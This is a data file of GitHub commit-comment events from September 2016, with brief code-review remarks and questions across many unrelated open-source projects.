{"id":"4517758296","type":"CommitCommentEvent","actor":{"login":"Gutz-Pilz"},"repo":{"name":"rix1337/RSScrawler"},"payload":{"comment":{"id":18902310,"position":25,"line":36,"path":"RSScrawler.py","commit_id":"4c3dfce6656ed38793d94260436d23edf999e0a9","created_at":"2016-09-05T16:51:47Z","updated_at":"2016-09-05T16:51:47Z","body":"das ist lustig\r\n"}},"created_at":"2016-09-05T16:51:47Z"}
{"id":"4517758942","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"hxim/Stockfish"},"payload":{"comment":{"id":18902313,"position":null,"line":null,"path":null,"commit_id":"f32db5877e07156dd22f5cf672fe40ebf72da0eb","created_at":"2016-09-05T16:51:58Z","updated_at":"2016-09-05T16:51:58Z","body":"Since PawnValueMg=188 in current master, this patch use `QuadUnits = 1786 = 9.5 pawns`and `MaxUnits = 2543 = 13.52 pawns`. The function s(A) used to transform from A=attackUnits to midgame score s(A) is continuous and has the following shape:\r\n• a parabola from A=0 to A=9.5 pawns, where is takes a value of 4.75 pawns\r\n• then a linear, increasing function between A=9.5 pawns and A=13.52 pawns, where it take the value 8.77 pawns\r\n• flat at level 8.77 pawns when A is greater than 13.52 pawns\r\n\r\n\r\n"}},"created_at":"2016-09-05T16:51:58Z"}
{"id":"4517762586","type":"CommitCommentEvent","actor":{"login":"juloj"},"repo":{"name":"juloja/hello-world"},"payload":{"comment":{"id":18902322,"position":4,"line":9,"path":"console/console/console.cpp","commit_id":"f039f22d3665e05a7d46811034bba546db6c8def","created_at":"2016-09-05T16:53:12Z","updated_at":"2016-09-05T16:53:12Z","body":"format?"}},"created_at":"2016-09-05T16:53:12Z"}
{"id":"4517762799","type":"CommitCommentEvent","actor":{"login":"juloj"},"repo":{"name":"juloja/hello-world"},"payload":{"comment":{"id":18902323,"position":null,"line":null,"path":null,"commit_id":"f039f22d3665e05a7d46811034bba546db6c8def","created_at":"2016-09-05T16:53:16Z","updated_at":"2016-09-05T16:53:16Z","body":"nice"}},"created_at":"2016-09-05T16:53:16Z"}
{"id":"4517764699","type":"CommitCommentEvent","actor":{"login":"excalibur1234"},"repo":{"name":"excalibur1234/pacli-simple"},"payload":{"comment":{"id":18902326,"position":null,"line":null,"path":null,"commit_id":"fc0dac1f311669a29b77769ea6c13d6304d53373","created_at":"2016-09-05T16:53:56Z","updated_at":"2016-09-05T16:53:56Z","body":"i think you misinterpreted the `echo \"/etc/sysctl.d/*     \"` code. the directory/* part is only part of a string. fzf only displays a list of strings. then, the first part of the selected string is taken and `sudo $EDITOR string`. and `sudo $EDITOR /etc/sysctl.d/* ` works really well.\r\n\r\n\r\ni am pretty sure what you mean with `printf \"%` . after googling this code string i found detailed information. but i rather not use this code, because i want to have easy code in pacli-simple. and \r\n`echo \"______________ B\"` (sorry, markdown does not like spaces) \r\nis much more intuitive than \r\n`printf \"%-12s B\"`\r\neven though it is more error-prone and clutters the code."}},"created_at":"2016-09-05T16:53:56Z"}
{"id":"4517765310","type":"CommitCommentEvent","actor":{"login":"mkordas"},"repo":{"name":"jcabi/jcabi-parent"},"payload":{"comment":{"id":18902328,"position":null,"line":null,"path":null,"commit_id":"4b641392d53c24633d75cc5671694e3a3785b7fa","created_at":"2016-09-05T16:54:11Z","updated_at":"2016-09-05T16:54:11Z","body":"@yegor256 can you do release in this project? It would be nice to have this commit released"}},"created_at":"2016-09-05T16:54:11Z"}
{"id":"4517765813","type":"CommitCommentEvent","actor":{"login":"kotarou3"},"repo":{"name":"Zarel/Pokemon-Showdown-Client"},"payload":{"comment":{"id":18902329,"position":18,"line":222,"path":"js/client.js","commit_id":"eec3263538520ba93aff4876a18753f7572b8ab2","created_at":"2016-09-05T16:54:21Z","updated_at":"2016-09-05T16:54:21Z","body":"Isn't it `indexOf`? And you're missing a `>= 0` as well"}},"created_at":"2016-09-05T16:54:21Z"}
{"id":"4517767417","type":"CommitCommentEvent","actor":{"login":"kotarou3"},"repo":{"name":"Zarel/Pokemon-Showdown-Client"},"payload":{"comment":{"id":18902332,"position":5,"line":214,"path":"js/client.js","commit_id":"eec3263538520ba93aff4876a18753f7572b8ab2","created_at":"2016-09-05T16:54:55Z","updated_at":"2016-09-05T16:54:55Z","body":"Sounds like you might want a case insensitive match here"}},"created_at":"2016-09-05T16:54:55Z"}
{"id":"4517768515","type":"CommitCommentEvent","actor":{"login":"cjihrig"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":18902334,"position":24,"line":3425,"path":"src/node.cc","commit_id":"a01e8bcf189bd598d496f347f60007bc2211e528","created_at":"2016-09-05T16:55:16Z","updated_at":"2016-09-05T16:55:16Z","body":"setups -> sets up"}},"created_at":"2016-09-05T16:55:16Z"}
{"id":"4517780241","type":"CommitCommentEvent","actor":{"login":"mcornella"},"repo":{"name":"robbyrussell/oh-my-zsh"},"payload":{"comment":{"id":18902361,"position":5,"line":164,"path":"plugins/git/git.plugin.zsh","commit_id":"298b63513dbbc94f750433e79750d07d96c87d62","created_at":"2016-09-05T16:59:36Z","updated_at":"2016-09-05T16:59:36Z","body":"According to the [documentation of git-log](https://git-scm.com/docs/git-log#_commit_formatting):\r\n> **`--pretty[=<format>]`**\r\n> **`--format=<format>`**\r\n>\r\n>    Pretty-print the contents of the commit logs in a given format, where <format> can be one of oneline, short, medium, full, fuller, email, raw, format:<string> and tformat:<string>. When <format> is none of the above, and has %placeholder in it, it acts as if --pretty=tformat:<format> were given.\r\n>\r\n>    See the \"PRETTY FORMATS\" section for some additional details for each format. When =<format> part is omitted, it defaults to medium.\r\n>\r\n>    Note: you can specify the default pretty format in the repository configuration (see git-config[1]).\r\n\r\nboth flags are equivalent."}},"created_at":"2016-09-05T16:59:36Z"}
{"id":"4517780284","type":"CommitCommentEvent","actor":{"login":"mcollina"},"repo":{"name":"jsumners/pino-socket"},"payload":{"comment":{"id":18902362,"position":20,"line":49,"path":"lib/TcpConnection.js","commit_id":"296a9e161ede7de484aea418902a0d29dd3da88a","created_at":"2016-09-05T16:59:38Z","updated_at":"2016-09-05T16:59:38Z","body":"Don't do this, you are not respecting backpressure. You might want to use a `PassThrough` and  `pipe()`."}},"created_at":"2016-09-05T16:59:38Z"}
{"id":"4517781052","type":"CommitCommentEvent","actor":{"login":"anxingle"},"repo":{"name":"igormq/ctc_tensorflow_example"},"payload":{"comment":{"id":18902365,"position":null,"line":null,"path":null,"commit_id":"b282d48bbe247517dc2283aa36d41f5c059d0473","created_at":"2016-09-05T16:59:53Z","updated_at":"2016-09-05T16:59:53Z","body":"So nice!"}},"created_at":"2016-09-05T16:59:53Z"}
{"id":"4517781297","type":"CommitCommentEvent","actor":{"login":"joneit"},"repo":{"name":"openfin/fin-hypergrid"},"payload":{"comment":{"id":18902367,"position":37,"line":665,"path":"src/dataModels/JSON.js","commit_id":"391d6ea35e16a5279092de87a81abf257c38ba84","created_at":"2016-09-05T16:59:59Z","updated_at":"2016-09-05T16:59:59Z","body":"@Dwaynekj I was surprised to find these \"deprecated.\" Just because a method is not used by our demo doesn't mean it is \"unused\"; it could be used by the application developer. I agree that ideally we should have a demo for every feature, but that is currently not the case.\r\n\r\nWe can't just remove methods with no explanation or no alternative. I see that you did put in a call to `deprecated()` but I think you misunderstand the way it is supposed to be used.\r\n\r\nWhen properly used, `deprecated()`...\r\n\r\n0. produces a console warning (on the first few calls only) explaining:\r\n    * what is being deprecated; and\r\n    * what to call instead.\r\n0. It then proceeds to use that substitute.\r\n\r\nThus, the previous functionality is maintained (for now). Your usage here will simply error out, making these functions useless. Therefore I'm removing them (`buildRow` and `getValueByField`) altogether but we should consider restoring them.\r\n"}},"created_at":"2016-09-05T16:59:59Z"}
{"id":"4517781657","type":"CommitCommentEvent","actor":{"login":"armaurya"},"repo":{"name":"armaurya/ListTable"},"payload":{"comment":{"id":18902369,"position":null,"line":null,"path":null,"commit_id":"2f0b2e18f0a98ec2e69f43c8b36bbdfe679a1bae","created_at":"2016-09-05T17:00:08Z","updated_at":"2016-09-05T17:00:08Z","body":"Since the new sorting method is working fine, removing the old method.\r\nTested the new sorting logic against the String and Integer data. I have some concerns about whether it can handle that. Working on that"}},"created_at":"2016-09-05T17:00:08Z"}
{"id":"4517782712","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18902383,"position":null,"line":null,"path":null,"commit_id":"0e53b81e5554622e6cfe5d4203c30ce0bd6a18f2","created_at":"2016-09-05T17:00:25Z","updated_at":"2016-09-05T17:00:25Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/396/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1928)."}},"created_at":"2016-09-05T17:00:25Z"}
{"id":"4517783224","type":"CommitCommentEvent","actor":{"login":"KcNirvana"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18902384,"position":4,"line":1571,"path":"Portuguese/device/cancro/Settings.apk/res/values-pt-rPT/strings.xml","commit_id":"c733fd5de4c44d96a181cdf1299df10950154ccb","created_at":"2016-09-05T17:00:35Z","updated_at":"2016-09-05T17:00:35Z","body":"Só Mi5"}},"created_at":"2016-09-05T17:00:35Z"}
{"id":"4517783421","type":"CommitCommentEvent","actor":{"login":"KcNirvana"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18902385,"position":13,"line":2695,"path":"Portuguese/device/cancro/Settings.apk/res/values-pt-rPT/strings.xml","commit_id":"c733fd5de4c44d96a181cdf1299df10950154ccb","created_at":"2016-09-05T17:00:39Z","updated_at":"2016-09-05T17:00:39Z","body":"<string name=\"search_networks_title\">Redes móveis</string>"}},"created_at":"2016-09-05T17:00:39Z"}
{"id":"4517783878","type":"CommitCommentEvent","actor":{"login":"ecrux"},"repo":{"name":"ecrux/primero"},"payload":{"comment":{"id":18902387,"position":null,"line":null,"path":null,"commit_id":"d69bdae43d21dbba968bb1408f44c149b112d984","created_at":"2016-09-05T17:00:49Z","updated_at":"2016-09-05T17:00:49Z","body":"Esta sera mi primera practica de prueba. "}},"created_at":"2016-09-05T17:00:49Z"}
{"id":"4517784748","type":"CommitCommentEvent","actor":{"login":"ilaripih"},"repo":{"name":"cutechess/cutechess"},"payload":{"comment":{"id":18902388,"position":4,"line":275,"path":"projects/gui/src/mainwindow.cpp","commit_id":"65506e2f2a1c26b64e88157a785c8342a09ce040","created_at":"2016-09-05T17:01:06Z","updated_at":"2016-09-05T17:01:06Z","body":"@artoj Can you check if the Settings dialog (Preferences) is still accessible on MacOS now that the action is not added to any menu?"}},"created_at":"2016-09-05T17:01:06Z"}
{"id":"4517785784","type":"CommitCommentEvent","actor":{"login":"rix1337"},"repo":{"name":"rix1337/RSScrawler"},"payload":{"comment":{"id":18902390,"position":25,"line":36,"path":"RSScrawler.py","commit_id":"4c3dfce6656ed38793d94260436d23edf999e0a9","created_at":"2016-09-05T17:01:25Z","updated_at":"2016-09-05T17:01:25Z","body":"Ich hinterlasse schon easter eggs :P "}},"created_at":"2016-09-05T17:01:25Z"}
{"id":"4517787068","type":"CommitCommentEvent","actor":{"login":"KcNirvana"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18902397,"position":22,"line":3342,"path":"Portuguese/device/cancro/Settings.apk/res/values-pt-rPT/strings.xml","commit_id":"c733fd5de4c44d96a181cdf1299df10950154ccb","created_at":"2016-09-05T17:01:56Z","updated_at":"2016-09-05T17:01:56Z","body":"<string name=\"smallwindow_smartcover_title\">Transparent window</string>\r\nPosso por como tava uma vez k n sei k porcaria e essa"}},"created_at":"2016-09-05T17:01:56Z"}
{"id":"4517789571","type":"CommitCommentEvent","actor":{"login":"shordeaux"},"repo":{"name":"avernois/devfriendlyplaces"},"payload":{"comment":{"id":18902402,"position":null,"line":null,"path":null,"commit_id":"e082ea882951faa70020962adde2d32f2a3cbea1","created_at":"2016-09-05T17:02:49Z","updated_at":"2016-09-05T17:02:49Z","body":"Les espaces de coworking ne sont plus dev-friendly?"}},"created_at":"2016-09-05T17:02:49Z"}
{"id":"4517789876","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18902404,"position":null,"line":null,"path":null,"commit_id":"0d14a527906b4f1dc5700c0e0b5913a7aad444e4","created_at":"2016-09-05T17:02:55Z","updated_at":"2016-09-05T17:02:55Z","body":"Also see [Issue 252: Rijndael Base::UncheckedSetKey and out-of-bounds read](http://github.com/weidai11/cryptopp/issues/252)."}},"created_at":"2016-09-05T17:02:55Z"}
{"id":"4517790232","type":"CommitCommentEvent","actor":{"login":"thezoggy"},"repo":{"name":"sabnzbd/sabnzbd"},"payload":{"comment":{"id":18902406,"position":null,"line":null,"path":null,"commit_id":"1a66372e9b5289ef5dee69f44f28969f6d9dcacb","created_at":"2016-09-05T17:03:04Z","updated_at":"2016-09-05T17:03:04Z","body":"just fyi, making api output changes can result in breaking apps.. \r\nhttps://github.com/Sonarr/Sonarr/commit/97d0ddb6e960d221856adafe41cc41d02e686cb0\r\n"}},"created_at":"2016-09-05T17:03:04Z"}
{"id":"4517790954","type":"CommitCommentEvent","actor":{"login":"abioteau"},"repo":{"name":"abioteau/android-repository"},"payload":{"comment":{"id":18902411,"position":null,"line":null,"path":null,"commit_id":"f0f57609ca54ca352fd08330e58eb81364fed4e5","created_at":"2016-09-05T17:03:19Z","updated_at":"2016-09-05T17:03:19Z","body":"It is just to collect all \"build-tools\" and \"support\" artifacts."}},"created_at":"2016-09-05T17:03:19Z"}
{"id":"4517791282","type":"CommitCommentEvent","actor":{"login":"KcNirvana"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18902412,"position":31,"line":3934,"path":"Portuguese/device/cancro/Settings.apk/res/values-pt-rPT/strings.xml","commit_id":"c733fd5de4c44d96a181cdf1299df10950154ccb","created_at":"2016-09-05T17:03:26Z","updated_at":"2016-09-05T17:03:26Z","body":"Correctio"}},"created_at":"2016-09-05T17:03:26Z"}
{"id":"4517795327","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18902419,"position":null,"line":null,"path":null,"commit_id":"7858c0e691257e4e7777960ebe1f4ae3c3fd977c","created_at":"2016-09-05T17:04:47Z","updated_at":"2016-09-05T17:04:47Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/397/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1928)."}},"created_at":"2016-09-05T17:04:47Z"}
{"id":"4517798168","type":"CommitCommentEvent","actor":{"login":"rix1337"},"repo":{"name":"rix1337/RSScrawler"},"payload":{"comment":{"id":18902422,"position":25,"line":36,"path":"RSScrawler.py","commit_id":"4c3dfce6656ed38793d94260436d23edf999e0a9","created_at":"2016-09-05T17:05:50Z","updated_at":"2016-09-05T17:05:50Z","body":"Fail sollte behoben sein. Nächstes mal trink ich mehr Kaffee .."}},"created_at":"2016-09-05T17:05:50Z"}
{"id":"4517801351","type":"CommitCommentEvent","actor":{"login":"jakobzmrzlikar"},"repo":{"name":"mucamaca/gravity_connect"},"payload":{"comment":{"id":18902426,"position":null,"line":null,"path":null,"commit_id":"faa8553358fb4e8dd0909a862e0799a987ab58a8","created_at":"2016-09-05T17:06:56Z","updated_at":"2016-09-05T17:06:56Z","body":"supr :)"}},"created_at":"2016-09-05T17:06:56Z"}
{"id":"4517801474","type":"CommitCommentEvent","actor":{"login":"andreasnoack"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18902427,"position":null,"line":null,"path":null,"commit_id":"6bb08bfec20c5678a1147022ce3ccc18db94601d","created_at":"2016-09-05T17:06:59Z","updated_at":"2016-09-05T17:06:59Z","body":"Yes, as pointed out by @vtjnash there is a call to the vectorized `abs`."}},"created_at":"2016-09-05T17:06:59Z"}
{"id":"4517801851","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18902428,"position":null,"line":null,"path":null,"commit_id":"9767221125a27a5bca8b98b4a67a86aac05162a0","created_at":"2016-09-05T17:07:09Z","updated_at":"2016-09-05T17:07:09Z","body":"Also see [Issue 252: Rijndael Base::UncheckedSetKey and out-of-bounds read](http://github.com/weidai11/cryptopp/issues/252)."}},"created_at":"2016-09-05T17:07:09Z"}
{"id":"4517803463","type":"CommitCommentEvent","actor":{"login":"jakobzmrzlikar"},"repo":{"name":"mucamaca/gravity_connect"},"payload":{"comment":{"id":18902434,"position":null,"line":null,"path":null,"commit_id":"1967f5ecd366cbef712541ff8e06bc178400ee19","created_at":"2016-09-05T17:07:44Z","updated_at":"2016-09-05T17:07:44Z","body":"oki supr da si to naredu"}},"created_at":"2016-09-05T17:07:44Z"}
{"id":"4517806986","type":"CommitCommentEvent","actor":{"login":"kevinolega"},"repo":{"name":"kevinolega/homepage"},"payload":{"comment":{"id":18902446,"position":null,"line":null,"path":null,"commit_id":"0b2cc1d4a6c396945c39d1d945780b30d0dcccf6","created_at":"2016-09-05T17:09:05Z","updated_at":"2016-09-05T17:09:05Z","body":"Added cname"}},"created_at":"2016-09-05T17:09:05Z"}
{"id":"4517808552","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18902453,"position":null,"line":null,"path":null,"commit_id":"edf7bd8fa6e1f7d97f2f8630943fc8dc7296a29b","created_at":"2016-09-05T17:09:39Z","updated_at":"2016-09-05T17:09:39Z","body":"Also see [Issue 252: Rijndael Base::UncheckedSetKey and out-of-bounds read](http://github.com/weidai11/cryptopp/issues/252)."}},"created_at":"2016-09-05T17:09:39Z"}
{"id":"4517809064","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"SalmonGER/StatsPE"},"payload":{"comment":{"id":18902456,"position":null,"line":null,"path":null,"commit_id":"8aa3d1ee4c5d2263c4b5015e868e3b6b0d7e8488","created_at":"2016-09-05T17:09:51Z","updated_at":"2016-09-05T17:09:51Z","body":"__cnstrctEsyFltingTxtListnr LvlChangeEvnt updateAllFtingTxts plesue gesundheit"}},"created_at":"2016-09-05T17:09:51Z"}
{"id":"4517810959","type":"CommitCommentEvent","actor":{"login":"Jurld"},"repo":{"name":"CobaltWolf/Bluedog-Design-Bureau"},"payload":{"comment":{"id":18902460,"position":null,"line":null,"path":null,"commit_id":"8a977535152b64ae96ebe65f50eb00fa089b966c","created_at":"2016-09-05T17:10:32Z","updated_at":"2016-09-05T17:10:32Z","body":"Hi, I'm the author of the PEBKAC LES mod and I supplied the model for this BDB Apollo LES.\r\n\r\nThe PEBKAC plugin code does a few things I never figured out another way to achieve:\r\n\r\n- dynamically impart lift at specific time interval to coincide with canards deployment animation\r\n- auto-jettison the LES (and do that when capsule is pointed retrograde)\r\n\r\nUsing one part makes it easier for a player just to slap on a single part and go.\r\n\r\nI use three parts in my PEBKAC LES mod. The NASA Apollo LES was built the same way.  It might still work \"OK\" as two parts, but I never tested that scenario.  The main problem would be getting the center of mass correct so that it doesn't shift too far aft as the solid fuel burns off.\r\n\r\nI don't think it is possible to do it with less than two parts and have it maintain stable flight until canards deploy.  The nosecone part in my mod has a lot of ballast (as in real life) that contributes to the correct location of center of mass, as alluded to above.  Aside from that, the nosecone may or may not need to remain a separate part for the aerodynamics to work well.\r\n\r\nThis BDB model doesn't have the animated canards but I've committed myself to creating a version that does.\r\n\r\nYou could get by with a single-part LES and not require a plugin if you are willing to accept a few things:\r\n\r\n- the pod will flip retro by itself in a way that is not at all realistic or even predictable\r\n- the canard animation is only eye-candy that will almost never line up exactly with that flipping\r\n- you don't mind having to manually jettison the LES after an abort\r\n\r\nThe real-life Apollo had a number of Abort modes that did different things according to altitude, so if you wanted to enter that territory you'd need code to manage all the variations.\r\n\r\nFinally, I actually agree that going into this level of detail is way overkill for a part that is seldom (if ever) used and even when it is needed, the stock one is almost sufficient (way under-powered is its main problem).  I mainly built the PEBKAC mod because I wanted to learn how to model and write plugins and nobody else seemed to be working on anything like it at the time.  That 1300-ish folks have downloaded my \"solution in search of a problem\" from Spacedock kind of blows my mind."}},"created_at":"2016-09-05T17:10:32Z"}
{"id":"4517812748","type":"CommitCommentEvent","actor":{"login":"ksrubka"},"repo":{"name":"ksrubka/cinema-system"},"payload":{"comment":{"id":18902466,"position":null,"line":null,"path":null,"commit_id":"0630e0b13840ebcc6cae20cb67328c5f01bbc78b","created_at":"2016-09-05T17:11:14Z","updated_at":"2016-09-05T17:11:14Z","body":"Pomyliłam się w komentarzu - powinno oczywiście być: CinemaController. \r\nGettery i settery dla dto są niezbędne dla poprawnego mapowania żeby działał request z Soap UI"}},"created_at":"2016-09-05T17:11:14Z"}
{"id":"4517813643","type":"CommitCommentEvent","actor":{"login":"mandrivo"},"repo":{"name":"mandrivo/arduino-with-rfid-php-mysql"},"payload":{"comment":{"id":18902468,"position":null,"line":null,"path":null,"commit_id":"424bfd2111a1dba46dcb10267a36393d5c06c755","created_at":"2016-09-05T17:11:34Z","updated_at":"2016-09-05T17:11:34Z","body":"A question, in which part of the code mention how need to be connected the pines of Arduino, and how many field need to be created into the database table"}},"created_at":"2016-09-05T17:11:34Z"}
{"id":"4517818255","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18902476,"position":null,"line":null,"path":null,"commit_id":"d0e75644d48b67ebae0cd19ba9b9c6c07df76e51","created_at":"2016-09-05T17:13:18Z","updated_at":"2016-09-05T17:13:18Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/398/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1928)."}},"created_at":"2016-09-05T17:13:18Z"}
{"id":"4517819096","type":"CommitCommentEvent","actor":{"login":"excalibur1234"},"repo":{"name":"excalibur1234/pacli-simple"},"payload":{"comment":{"id":18902478,"position":null,"line":null,"path":null,"commit_id":"3adb272a7dafce0e17e297d680e8d3e80cff1234","created_at":"2016-09-05T17:13:40Z","updated_at":"2016-09-05T17:13:40Z","body":"thanks @ https://github.com/Chrysostomus/bmenu/blob/master/bin/system-settings for this idea!"}},"created_at":"2016-09-05T17:13:40Z"}
{"id":"4517819677","type":"CommitCommentEvent","actor":{"login":"sourcerer-mike"},"repo":{"name":"sourcerer-mike/crmp"},"payload":{"comment":{"id":18902479,"position":39,"line":39,"path":"src/Crmp/CrmBundle/DomainRepository/Addresses.php","commit_id":"89adfcfdb44dc141cb1d7dde237deb3b7a619308","created_at":"2016-09-05T17:13:53Z","updated_at":"2016-09-05T17:13:53Z","body":"OMG. This should use the given objects and turn them into Addresses objects from the domain. What a waste of runtime ... How to solve this?"}},"created_at":"2016-09-05T17:13:53Z"}
{"id":"4517822545","type":"CommitCommentEvent","actor":{"login":"Jurld"},"repo":{"name":"CobaltWolf/Bluedog-Design-Bureau"},"payload":{"comment":{"id":18902483,"position":null,"line":null,"path":null,"commit_id":"8a977535152b64ae96ebe65f50eb00fa089b966c","created_at":"2016-09-05T17:14:55Z","updated_at":"2016-09-05T17:14:55Z","body":"Also, I named the \"extra\" resources in such a way to minimize the odds of squad (or anybody else) creating a resource with the same name. Looks like jsolson just maintained my naming convention.  The casual user will never see them and anybody somewhat familiar with how the game uses this stuff under the covers should be able to figure it out."}},"created_at":"2016-09-05T17:14:55Z"}
{"id":"4517824651","type":"CommitCommentEvent","actor":{"login":"avernois"},"repo":{"name":"avernois/devfriendlyplaces"},"payload":{"comment":{"id":18902485,"position":null,"line":null,"path":null,"commit_id":"e082ea882951faa70020962adde2d32f2a3cbea1","created_at":"2016-09-05T17:15:46Z","updated_at":"2016-09-05T17:15:46Z","body":"My reasons are explained in the commit message. Discussion about it happened in #168."}},"created_at":"2016-09-05T17:15:46Z"}
{"id":"4517827341","type":"CommitCommentEvent","actor":{"login":"Edrie"},"repo":{"name":"deanm1278/Arduino-ribbon-synth"},"payload":{"comment":{"id":18902493,"position":null,"line":null,"path":null,"commit_id":"a684c3c7527d96e4c2a744909e3c611396f8d03c","created_at":"2016-09-05T17:16:53Z","updated_at":"2016-09-05T17:16:53Z","body":"Hi\r\nthanks for the great projekt. I have found your new code but I think it is for an other hardware, because my ribbon synth has no TRELLIS, WIRE, LED´s and so one. Is there an new shematic for this new code ?\r\nThanks\r\nEdrie"}},"created_at":"2016-09-05T17:16:53Z"}
{"id":"4517833007","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18902499,"position":null,"line":null,"path":null,"commit_id":"c762b62a7e90bfd425e1a9856ae34b55d8eb8ce3","created_at":"2016-09-05T17:19:07Z","updated_at":"2016-09-05T17:19:07Z","body":"Absolutely. I didn't see that when reviewing. I'll fix it."}},"created_at":"2016-09-05T17:19:07Z"}
{"id":"4517833939","type":"CommitCommentEvent","actor":{"login":"gkalpak"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":18902500,"position":44,"line":54,"path":"docs/content/guide/security.ngdoc","commit_id":"7eddc8891b516ad99152b0826f655e37c4fa728c","created_at":"2016-09-05T17:19:26Z","updated_at":"2016-09-05T17:19:26Z","body":"Why `orderBy` specifically"}},"created_at":"2016-09-05T17:19:26Z"}
{"id":"4517834156","type":"CommitCommentEvent","actor":{"login":"pstef"},"repo":{"name":"pstef/freebsd_indent"},"payload":{"comment":{"id":18902502,"position":null,"line":null,"path":null,"commit_id":"11470baaf986b58a1b3d2456a51416e2b23e0662","created_at":"2016-09-05T17:19:32Z","updated_at":"2016-09-05T17:19:32Z","body":"Not yet, this is still broken."}},"created_at":"2016-09-05T17:19:32Z"}
{"id":"4517836490","type":"CommitCommentEvent","actor":{"login":"pixover"},"repo":{"name":"TpeSiGuillaumeJulesLuc/TPE"},"payload":{"comment":{"id":18902505,"position":null,"line":null,"path":null,"commit_id":"0300b107ce295ff630c9ea9193fd0710e88e8243","created_at":"2016-09-05T17:20:25Z","updated_at":"2016-09-05T17:20:25Z","body":"Jul"}},"created_at":"2016-09-05T17:20:25Z"}
{"id":"4517837146","type":"CommitCommentEvent","actor":{"login":"sdumitriu"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18902506,"position":null,"line":null,"path":null,"commit_id":"16142b5d27d3cee3b325cba43f35ab4256056192","created_at":"2016-09-05T17:20:39Z","updated_at":"2016-09-05T17:20:39Z","body":"@vmassol: @tmortagne isn't talking about a following commit, but about [the previous one](https://github.com/xwiki/xwiki-platform/commit/7f7e1fe9d7bf6ddd0297292519c0a8c2ed908f8f). The diff you see isn't the whole change that he did, meaning that he didn't replace `{@code}` with `<code>`, what he did change is `<p><pre><code>` with `<pre><code>`, through an intermediary commit which used `<pre>{@code}`. And the reason why it doesn't always work is because of the embedded `}` in the quoted code, which may confuse the parser. For example in Eclipse I see the last `}` included in the javadoc."}},"created_at":"2016-09-05T17:20:39Z"}
{"id":"4517837334","type":"CommitCommentEvent","actor":{"login":"ocefpaf"},"repo":{"name":"conda-forge/staged-recipes"},"payload":{"comment":{"id":18902507,"position":2,"line":2,"path":"recipes/llvmdev38/build.sh","commit_id":"b56d6d93b58b3dd3a7dcf4d0de0f3175ca1c53d5","created_at":"2016-09-05T17:20:44Z","updated_at":"2016-09-05T17:20:44Z","body":"@inducer don't use sudo in the recipe and apt-get won't work b/c the underlying image is `CentOS` (`yum`).\r\n\r\nWe have a scheme to install things from the system when there is no alternative. (Ideally we should package all the dependencies with conda.)\r\n\r\nYou have to create a file named `yum_requirements.txt` with the list of system dependencies you want to use."}},"created_at":"2016-09-05T17:20:44Z"}
{"id":"4517837350","type":"CommitCommentEvent","actor":{"login":"benson6"},"repo":{"name":"benson6/hello_world"},"payload":{"comment":{"id":18902508,"position":null,"line":null,"path":null,"commit_id":"8db3044f940456ea41cb2b4dedbee5bd6f3ff9a1","created_at":"2016-09-05T17:20:44Z","updated_at":"2016-09-05T17:20:44Z","body":"8db3044f940456ea41cb2b4dedbee5bd6f3ff9a1"}},"created_at":"2016-09-05T17:20:44Z"}
{"id":"4517840309","type":"CommitCommentEvent","actor":{"login":"pixover"},"repo":{"name":"TpeSiGuillaumeJulesLuc/TPE"},"payload":{"comment":{"id":18902511,"position":2,"line":2,"path":"README.md","commit_id":"0300b107ce295ff630c9ea9193fd0710e88e8243","created_at":"2016-09-05T17:21:51Z","updated_at":"2016-09-05T17:21:51Z","body":"Jul"}},"created_at":"2016-09-05T17:21:51Z"}
{"id":"4517841369","type":"CommitCommentEvent","actor":{"login":"Thomas--S"},"repo":{"name":"HybridDog/streets"},"payload":{"comment":{"id":18902516,"position":null,"line":null,"path":null,"commit_id":"69b87ca345c90db168ef0f726e34730a0fdeccb2","created_at":"2016-09-05T17:22:18Z","updated_at":"2016-09-05T17:22:18Z","body":"Hello @HybridDog,\r\n\r\nis it ok for you, if your code from this commit is used in the streets mod main repository under the BSD-2-clause license?\r\nI would really appreciate it, if you use the same license as the street project (BSD-2-clause) for this commit.\r\nThis would allow us to use this great feature for the Streets 2.0 relaunch.\r\n\r\nThanks in advance for your efforts!"}},"created_at":"2016-09-05T17:22:18Z"}
